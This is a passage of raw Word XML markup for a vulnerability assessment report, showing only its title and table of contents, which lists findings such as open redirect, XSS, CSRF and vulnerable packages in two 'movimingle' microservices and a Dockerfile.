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021D" w14:textId="77777777" w:rsidR="00572BDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Assessment Report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526B4FA8" w14:textId="77777777" w:rsidR="001C5827" w:rsidRDefault="001C5827">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="78653094"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="3976221C" w14:textId="363830BE" w:rsidR="001C5827" w:rsidRDefault="001C5827">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="00BADC8D" w14:textId="57A3D51A" w:rsidR="00DA30E1" w:rsidRDefault="001C5827">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc168573788" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Executive Summary</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573788 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BABCA38" w14:textId="578C3368" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573789" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Introduction</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573789 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28798B46" w14:textId="7988799A" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573790" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Vulnerability Analysis</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573790 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59E0C752" w14:textId="459F1431" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573791" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Project: movimingle-favorites-management-service</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573791 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F4B708B" w14:textId="777D50FB" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573792" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Open Redirect Vulnerability in Spring Web</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573792 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2C2934E7" w14:textId="04B3BE0E" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573793" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2. Cross-Site Scripting (XSS) Vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573793 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43DF426E" w14:textId="495302EC" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573794" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Project: movimingle-voting-service</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573794 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="67045EDC" w14:textId="7D465CC2" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573795" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. H2 Database Engine Vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573795 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DB80327" w14:textId="2BBB5A26" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573796" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3. Cross-Site Request Forgery (CSRF) Vulnerability</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573796 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="075DB1DC" w14:textId="7A7DC93F" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573797" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Dockerfile Vulnerabilities</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573797 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="307CEB5D" w14:textId="4678D572" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573798" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>dpkg - Directory Traversal</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573798 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="435E093B" w14:textId="5D9EA79E" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573799" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>openssl/libssl1.1 - OS Command Injection</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573799 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0994E9FD" w14:textId="2126E9FA" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573800" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>zlib/zlib1g - Out-of-bounds Write</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573800 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30E14250" w14:textId="0BEAD110" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573801" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>libtasn1-6 - Off-by-one Error</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc168573801 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F70C54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CB9C1C4" w14:textId="54A74E89" w:rsidR="00DA30E1" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8630"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc168573802" w:history="1">
            <w:r w:rsidR="00DA30E1" w:rsidRPr="00D3055B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>pcre2/libpcre2-8-0 - Out-of-bounds Read</w:t>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00DA30E1">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
